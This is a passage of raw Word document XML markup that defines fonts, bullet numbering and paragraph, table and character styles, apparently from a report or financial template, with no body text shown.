    <w:sig w:usb0="00000000" w:usb1="1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WenQuanYi Micro Hei"/>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mbria">
    <w:altName w:val="Georgia"/>
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="WenQuanYi Micro Hei">
    <w:panose1 w:val="020B0606030804020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E10002EF" w:usb1="6BDFFCFB" w:usb2="00800036" w:usb3="00000000" w:csb0="603E019F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Abyssinica SIL">
    <w:panose1 w:val="02000603020000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="800000EF" w:usb1="5000A04B" w:usb2="00000828" w:usb3="00000000" w:csb0="20000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="2000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="SimSun">
    <w:altName w:val="WenQuanYi Micro Hei"/>
    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000010" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Symbol">
    <w:altName w:val="Webdings"/>
    <w:panose1 w:val="05050102010706020507"/>
    <w:charset w:val="02"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Angsana New">
    <w:altName w:val="FreeSerif"/>
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cordia New">
    <w:altName w:val="Loma"/>
    <w:panose1 w:val="020B0304020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:altName w:val="Aroania"/>
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Liberation Sans Narrow"/>
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020F0302020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Webdings">
    <w:panose1 w:val="05030102010509060703"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="FreeSerif">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E59FAFFF" w:usb1="C200FDFF" w:usb2="43501B29" w:usb3="04000043" w:csb0="600101FF" w:csb1="FFFF0000"/>
  </w:font>
  <w:font w:name="Loma">
    <w:panose1 w:val="020B0504020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="8100002F" w:usb1="50002009" w:usb2="00000000" w:usb3="00000000" w:csb0="00010001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Aroania">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00002FF" w:usb1="5200F8DB" w:usb2="05000021" w:usb3="00800040" w:csb0="0000009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Liberation Sans Narrow">
    <w:panose1 w:val="020B0606020202030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002AF" w:usb1="500078FB" w:usb2="00000000" w:usb3="00000000" w:csb0="6000009F" w:csb1="DFD7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4294967177">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF89"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="18"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Cambria" w:hAnsi="Cambria"/>
        <w:color w:val="7E97AD" w:themeColor="accent1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="accent1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4294967170">
    <w:nsid w:val="FFFFFF82"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF82"/>
    <w:lvl w:ilvl="0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="182"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="4294967177"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="429496717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6F14"/>
    <w:rsid w:val="0009610A"/>
    <w:rsid w:val="001918BC"/>
    <w:rsid w:val="001E4A91"/>
    <w:rsid w:val="00254FAE"/>
    <w:rsid w:val="003B027F"/>
    <w:rsid w:val="003B141F"/>
    <w:rsid w:val="00490BFE"/>
    <w:rsid w:val="004950EA"/>
    <w:rsid w:val="004C3F9A"/>
    <w:rsid w:val="00630A82"/>
    <w:rsid w:val="0068279F"/>
    <w:rsid w:val="007A5B0D"/>
    <w:rsid w:val="00AC2647"/>
    <w:rsid w:val="00B1258C"/>
    <w:rsid w:val="00C5148D"/>
    <w:rsid w:val="00E134C6"/>
    <w:rsid w:val="00E26F14"/>
    <w:rsid w:val="00FF1E55"/>
  </w:rsids>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1" w:semiHidden="0" w:name="heading 1"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="heading 2"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="heading 3"/>
    <w:lsdException w:qFormat="1" w:uiPriority="18" w:semiHidden="0" w:name="heading 6"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="annotation text"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="header"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="footer"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="table of figures"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="annotation reference"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Bullet"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Number"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List 5"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Bullet 3"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="List Number 2"/>
    <w:lsdException w:qFormat="1" w:uiPriority="18" w:semiHidden="0" w:name="List Number 3"/>
    <w:lsdException w:uiPriority="18" w:semiHidden="0" w:name="List Number 4"/>
    <w:lsdException w:uiPriority="18" w:semiHidden="0" w:name="List Number 5"/>
    <w:lsdException w:qFormat="1" w:uiPriority="19" w:semiHidden="0" w:name="Title"/>
    <w:lsdException w:qFormat="1" w:uiPriority="1" w:semiHidden="0" w:name="Default Paragraph Font"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="List Continue 5"/>
    <w:lsdException w:qFormat="1" w:uiPriority="19" w:semiHidden="0" w:name="Subtitle"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Note Heading"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Body Text Indent 3"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="1" w:semiHidden="0" w:name="Strong"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Normal (Web)"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Cite"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="HTML Definition"/>
    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="Normal Table"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 1"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Classic 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Columns 3"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table List 8"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Contemporary"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Web 2"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="59" w:semiHidden="0" w:name="Table Grid"/>
    <w:lsdException w:uiPriority="99" w:semiHidden="0" w:name="Table Theme"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 2"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 3"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 3"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 4"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 5"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 6"/>
  </w:latentStyles>
  <w:style w:type="paragraph" w:default="1" w:styleId="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-360" w:right="-360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="36"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="15"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="577289" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="20"/>
      <w:sz w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="121"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="123"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="18"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0" w:line="288" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="6">
    <w:name w:val="Default Paragraph Font"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="7">
    <w:name w:val="Normal Table"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="10"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="12"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="B1C0CD" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="6"/>
        <w:left w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-360" w:right="-360"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="13">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="59"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>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character" w:customStyle="1" w:styleId="14">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="36"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="577289" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="20"/>
      <w:sz w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="No Spacing"/>
    <w:link w:val="17"/>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17">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="16"/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="40" w:line="288"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9">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:keepNext/>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="1"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="6"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="1"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="6"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w:spacing w:before="160" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="24"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="Table Text Decimal"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="decimal" w:pos="1902"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="21">
    <w:name w:val="Financial Table"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="144" w:right="144"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="20"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:insideH w:val="single" w:color="D8D8D8" w:themeColor="background1" w:themeShade="D9" w:sz="4" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        <w:b w:val="0"/>
        <w:caps/>
        <w:smallCaps w:val="0"/>
        <w:color w:val="7E97AD" w:themeColor="accent1"/>
        <w:sz w:val="22"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="accent1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:styleId="22">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="24"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="432" w:right="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
